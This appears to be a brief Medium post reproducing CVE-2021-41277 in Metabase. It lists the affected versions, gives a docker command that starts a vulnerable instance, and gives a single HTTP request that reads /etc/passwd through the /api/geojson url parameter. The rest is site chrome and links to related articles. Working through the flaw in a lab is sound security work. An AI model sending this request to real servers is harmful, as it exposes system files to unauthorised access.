CVE-2021–41277 Metabase sensitive information disclosure

metabase version < 0.40.5
metabase version >= 1.0.0, < 1.40.5
docker run -d -p 3000:3000 --name metabase metabase/metabase:v0.40.4
GET /api/geojson?url=file:/etc/passwd HTTP/1.1




#InfoSec | #RedTeam | #OSINT | #CyberSec | #Pentest

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

{UPDATE} Okey - ?nternetsiz Hack Free Resources Generator

Seafarers and accountants: a different cyber perspective

What is InsureDAO?

Save Planet Earth Token Receives a Perfect Score on CertiK

Alert! Fake trading and poker apps can steal all your cryptos

[New Coin Listing] GATEWAY PROTOCOL(GWP) to Be Listed on DigiFinex

Beyond Mere Decentralization — The Orthogonal Web

SketchyReq — Fetch Malware Securely and Conveniently

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store


#InfoSec | #RedTeam | #OSINT | #CyberSec | #Pentest

More from Medium

Intigriti’s January XSS challenge By TheRealBrenu

Business Logic Vulnerability:

The Time Machine — Weaponizing WaybackUrls for Recon, BugBounties , OSINT, Sensitive Endpoints and…

So you wanna be a hacker? Basics — (Web servers / methods / responses)